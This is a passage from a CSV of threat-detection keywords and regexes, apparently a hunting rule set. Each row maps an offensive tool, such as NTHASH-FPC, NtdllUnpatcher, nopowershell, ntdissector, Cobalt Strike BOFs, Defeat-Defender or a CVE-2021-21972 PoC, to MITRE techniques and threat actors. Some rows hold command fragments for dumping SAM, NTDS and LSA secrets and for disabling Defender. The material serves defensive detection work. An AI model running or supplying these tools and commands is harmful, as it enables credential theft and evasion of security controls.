TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","53587" "*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*",".{0,1000}\-\-noWAIT\s\-\-noFUNC\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","53588" "*nping -*",".{0,1000}nping\s.{0,1000}","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. 
Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. and more","T1046 - T1498","TA0043 - TA0002 - TA0007","N/A","Qilin","Discovery","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53590" "*npkoxkuygikbkpuf5yxte66um727wmdo2jtpg2djhb2e224i4r25v7ad.onion*",".{0,1000}npkoxkuygikbkpuf5yxte66um727wmdo2jtpg2djhb2e224i4r25v7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53594" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53602" "*nps whoami*",".{0,1000}nps\swhoami.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53603" "*nps_payload*",".{0,1000}nps_payload.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. 
It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","N/A","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53604" "*nps_payload.py*",".{0,1000}nps_payload\.py.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53605" "*nps_payload-master*",".{0,1000}nps_payload\-master.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","9","5","442","123","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z","53606" "*nrf24-scanner.py -l -v*",".{0,1000}nrf24\-scanner\.py\s\-l\s\-v.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53609" "*NSAKEY/nsa-rules*",".{0,1000}NSAKEY\/nsa\-rules.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","53610" 
"*nsa-rules-master*",".{0,1000}nsa\-rules\-master.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","N/A","10","6","547","125","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z","53611" "*nselib/data/passwords.lst*",".{0,1000}nselib\/data\/passwords\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53616" "*NS-Sp4ce/CVE-2021-21972*",".{0,1000}NS\-Sp4ce\/CVE\-2021\-21972.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","1","N/A","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","53619" "*NSudo -U:T -ShowWindowMode:Hide*",".{0,1000}NSudo\s\-U\:T\s\-ShowWindowMode\:Hide.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","53620" "*NT AUTHOIRTY\SYSTEM*",".{0,1000}NT\sAUTHOIRTY\\SYSTEM.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","53621" 
"*ntcreatethread.x64*",".{0,1000}ntcreatethread\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","53622" "*ntcreatethread.x86*",".{0,1000}ntcreatethread\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","53623" "*NtCreateUserProcessShellcode*",".{0,1000}NtCreateUserProcessShellcode.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","53624" "*ntdissector -*",".{0,1000}ntdissector\s\-.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53625" "*ntdissector-main*",".{0,1000}ntdissector\-main.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53626" "*Ntdll_SusProcess.*",".{0,1000}Ntdll_SusProcess\..{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","N/A","9","2","188","38","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z","53627" "*NTDLLReflection-main*",".{0,1000}NTDLLReflection\-main.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","53628" "*NtdllUnpatcher.cpp*",".{0,1000}NtdllUnpatcher\.cpp.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53629" "*NtdllUnpatcher.dll*",".{0,1000}NtdllUnpatcher\.dll.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53630" "*NtdllUnpatcher.lib*",".{0,1000}NtdllUnpatcher\.lib.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53631" "*NtdllUnpatcher.log*",".{0,1000}NtdllUnpatcher\.log.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","#logfile","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53632" "*NtdllUnpatcher.obj*",".{0,1000}NtdllUnpatcher\.obj.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53633" "*NtdllUnpatcher.sln*",".{0,1000}NtdllUnpatcher\.sln.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53634" 
"*NtdllUnpatcher_Injector*",".{0,1000}NtdllUnpatcher_Injector.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53635" "*NtdllUnpatcher-master*",".{0,1000}NtdllUnpatcher\-master.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","N/A","10","2","150","33","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z","53636" "*ntds/ntds.py*",".{0,1000}ntds\/ntds\.py.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","53637" "*ntds_grabber.md*",".{0,1000}ntds_grabber\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53638" "*ntdsdump.exe*",".{0,1000}ntdsdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","53639" "*NTDSgrab.ps1*",".{0,1000}NTDSgrab\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53640" "*NTDSHashes.dump*",".{0,1000}NTDSHashes\.dump.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","53641" "*ntfs-read.py*",".{0,1000}ntfs\-read\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53653" "*nth --text 5f4dcc3b5aa765d61d8327deb882cf99*",".{0,1000}nth\s\-\-text\s5f4dcc3b5aa765d61d8327deb882cf99.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53654" "*NTHASH /enumproc *",".{0,1000}NTHASH\s\/enumproc\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53655" "*NTHASH /runas *",".{0,1000}NTHASH\s\/runas\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - 
T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53656" "*NTHASH /runaschild /pid*",".{0,1000}NTHASH\s\/runaschild\s\/pid.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53657" "*NTHASH /runastoken *",".{0,1000}NTHASH\s\/runastoken\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53658" "*NTHASH /runwmi *",".{0,1000}NTHASH\s\/runwmi\s.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53659" "*NTHASH* /cryptunprotectdata /binary:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and 
C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53660" "*NTHASH* /cryptunprotectdata /input:*",".{0,1000}NTHASH.{0,1000}\s\/cryptunprotectdata\s\/input\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53661" "*NTHASH* /dumpsam*",".{0,1000}NTHASH.{0,1000}\s\/dumpsam.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53662" "*NTHASH* /enumcred*",".{0,1000}NTHASH.{0,1000}\s\/enumcred.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53663" "*NTHASH* /enumvault*",".{0,1000}NTHASH.{0,1000}\s\/enumvault.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various 
tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53664" "*NTHASH* /getlsakeys*",".{0,1000}NTHASH.{0,1000}\s\/getlsakeys.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53665" "*NTHASH* /wlansvc /binary:*",".{0,1000}NTHASH.{0,1000}\s\/wlansvc\s\/binary\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","53666" "*NTHASH-win32.exe*",".{0,1000}NTHASH\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential 